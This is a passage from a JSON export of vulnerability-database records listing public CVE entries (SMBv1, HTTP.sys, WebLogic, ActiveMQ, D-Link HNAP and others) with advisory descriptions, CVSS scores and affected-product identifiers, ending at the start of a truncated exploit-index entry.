"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.0.2", "cpe:/o:apple:tvos:6.0", "cpe:/o:apple:tvos:6.2", "cpe:/o:apple:iphone_os:7.0.4", "cpe:/o:apple:tvos:6.0.2", "cpe:/o:apple:iphone_os:7.1.1", "cpe:/o:apple:tvos:6.0.1", "cpe:/o:apple:iphone_os:7.1", "cpe:/o:apple:iphone_os:7.0.3", "cpe:/o:apple:iphone_os:7.0.2", "cpe:/o:apple:iphone_os:7.0", "cpe:/o:apple:tvos:6.1", "cpe:/o:apple:tvos:6.1.1", "cpe:/o:apple:iphone_os:7.0.6", "cpe:/o:apple:iphone_os:7.1.2", "cpe:/o:apple:iphone_os:7.0.1", "cpe:/o:apple:iphone_os:7.0.5", "cpe:/o:apple:tvos:6.1.2"], "id": "CVE-2014-4404", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:tvos:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:09:11", "description": "The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.", "cvss3": {}, "published": "2015-02-23T17:59:00", "type": "cve", "title": "CVE-2015-2051", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2051"], "modified": "2023-04-26T19:27:00", "cpe": ["cpe:/o:dlink:dir-645_firmware:1.04b12"], "id": "CVE-2015-2051", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2051", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:dlink:dir-645_firmware:1.04b12:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T15:07:24", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka \"LNK Remote Code Execution Vulnerability.\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8464", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2008:-"], "id": "CVE-2017-8464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:50", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-26T14:37:39", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-01T20:59:00", "type": "cve", "title": "CVE-2016-3088", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2019-03-27T20:29:00", "cpe": ["cpe:/a:apache:activemq:5.13.3"], "id": "CVE-2016-3088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:activemq:5.13.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:07:57", "description": "HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2015-04-14T20:59:00", "type": "cve", "title": "CVE-2015-1635", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2019-05-14T19:53:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_8.1:-"], "id": "CVE-2015-1635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1635", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0146", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0146", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0145", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0144", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0143", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0148", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:56", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0263", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1511"], "id": "CVE-2017-0263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:06:45", "description": "The XPC implementation in Admin Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges via unspecified vectors.", "cvss3": {}, "published": "2015-04-10T14:59:00", "type": "cve", "title": "CVE-2015-1130", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2015-09-17T17:41:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.2"], "id": "CVE-2015-1130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1130", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.10.2:*:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2022-07-13T19:02:52", "description": "# Oxide Hive\nAn exploit for the HiveNightmare/SeriousSAM vulnera...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 